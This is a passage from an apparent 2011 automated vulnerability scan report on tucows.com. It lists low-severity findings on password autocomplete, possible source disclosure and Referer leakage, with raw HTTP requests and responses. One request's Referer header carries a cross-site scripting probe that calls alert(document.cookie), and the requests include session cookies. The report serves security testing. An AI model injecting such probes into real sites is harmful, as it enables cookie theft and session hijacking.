Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.58. http://www.tucows.com/sitemap.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.59. http://www.tucows.com/software.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.60. http://www.tucows.com/software.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.61. http://www.tucows.com/terms.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.62. http://www.tucows.com/terms.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

5. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:50:37 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jan 2010 16:49:48 GMT
ETag: "777b1-adf-47d8741fd0300"
Accept-Ranges: bytes
Content-Length: 2783
Cache-Control: max-age=604800
Expires: Thu, 10 Feb 2011 20:50:37 GMT
Content-Type: application/javascript

function callAJAX(url, respHdlr, bPageView, failHdlr, callHdlr, bAsync) {

   var bAsync = (bAsync == null ? true : bAsync);
   var req;
   
   try {
       req = new XMLHttpRequest();                                                    /* e.g. Firefox
...[SNIP]...
or request variable. For example,
// assuming you used javascript to set a cookie called "php_array"
// to the value of a javascript array then you can restore the cookie
// from PHP like this:
// <?php
// session_start();
// $my_array = unserialize(urldecode(stripslashes($_COOKIE['php_array'])));
// print_r ($my_array);
// ?>

// /* This automatically converts both keys and values to strings.
// The return string is not URL escaped, so you must call the
// Javascript "escape()" function before you pass this string to PHP. *
...[SNIP]...

6. Cross-domain Referer leakage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /software.html?t=689&pf=win HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<li class="bt6"><a href="http://mobile.butterscotch.com/?src=tcv3mobile" target="_blank"></a></li>
<li class="bt7"><a href="http://www.butterscotch.com//free-software.html?src=tcv3freeware" target="_blank"></a></li>
<li class="bt8"><a href="http://www.butterscotch.com/?src=tcv3video" target="_blank"></a>
...[SNIP]...
</a>
<a href="http://www.butterscotch.com/free-software.html?src=software" target="_blank" class="linkOrange f15">Browse more <b>
...[SNIP]...
</a>
<a href="http://www.butterscotch.com/help/security?src=software" target="_blank" class="linkOrange f15">Browse more <b>
...[SNIP]...
<div id="cartouche" class="cartouchecontainer">
<a href="http://www.butterscotch.com/"><div class="cartoucheheader">
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr"><strong>
...[SNIP]...
<p>
In order to get the full Blu-ray experience you'll need to install the appropriate software. We show you how to do that in this episode.
<a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr"><strong>
...[SNIP]...
<p>
Not only does the Bing iPhone application allow you to view maps, you can also use it to check traffic in your area.
<a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr"><strong>
...[SNIP]...
<p>
Now that we've shown you how to add Blu-ray to a desktop computer we'll show you how to add Blu-ray to your notebook.
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr"><strong>
...[SNIP]...
<p>
The Bing iPhone app makes it easy to find whatever photos you're interested in. We'll show you how in this episode.
<a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr"><strong>
...[SNIP]...
<p>
Here we show you how to add a Blu-ray drive to your desktop computer and tell you what you'll need in your system to make it work.
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr"><strong>
...[SNIP]...
<p>
The Bing iPhone application makes it easy to find deals on flights from your local airport or check the status on a specific flight.
<a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr"><strong>
...[SNIP]...
<p>
In our first episode of this series, we'll tell you what exactly Blu-ray is and what it is used for.
<a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr"><strong>
...[SNIP]...
<p>
In this series we tell you what Blu-ray is and show you how to add Blu-ray drives to your computer and how to burn Blu-ray discs.
<a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr"><strong>
...[SNIP]...
<p>
Here we show you how to customize the bookmarks that appear in your Bing iPhone application.
<a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr"><strong>
...[SNIP]...
rs runs through all the steps in shooting and editing together great videos using the cameras on the iPhone 4 from the first time you hit the record button to the finished, polished end product.
<a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr"><img src="http://www-s.butterscotch.com/uplassets/iphone1.png" height=84 width=84 alt="How Do I Shoot video with the iPhone 4" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr"><strong>
...[SNIP]...
<p>
You can search for topics on Hootsuite much like you can on Twitter and you can save your searches for later reference.
<a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr"><strong>
...[SNIP]...
its own entity and its own task master is indy in the purest sense. Rather than toiling away in obscurity though, the band has harnessed social media like no other, selling over 600,000 records.
<a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr"><img src="http://www-s.butterscotch.com/uplassets/SU_Artwork_84x84.jpg" height=84 width=84 alt="Status Update" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr"><strong>
...[SNIP]...
<p>
We take a minute to show you GV Mobile+, an app that allows iPhone users to access Google Voice through their phone.
<a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr"><img src="http://www-s.butterscotch.com/uplassets/60-sec-84.jpg" height=84 width=84 alt="60-Second App - Apple" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr"><strong>
...[SNIP]...
<p>
If you use lists in your Twitter account then you'll be pleased to know that you can use them when you use Hootsuite as well.
<a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr"><strong>
...[SNIP]...
<p>
Amediasoft's iPad Video Converter does just what the name says: it converts video from just about any format you can throw at it into an iPad compatible file format.
<a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr"><img src="http://www-s.butterscotch.com/uplassets/MsDownload_AlbumArt_84.jpg" height=84 width=84 alt="Miss Download" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr"><strong>
...[SNIP]...
<p>
We review the Lego Creationary app for the iPad, the game that challenges you to guess what Lego structures are being built before they are completed.
<a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr"><img src="http://www-s.butterscotch.com/uplassets/60-sec-84.jpg" height=84 width=84 alt="60-Second App - Apple" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr"><strong>
...[SNIP]...
<p>
With your social networking accounts added to Hootsuite, you'll next want to organize the components of each account into the order that is most comfortable for you to read.
<a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouche_content">
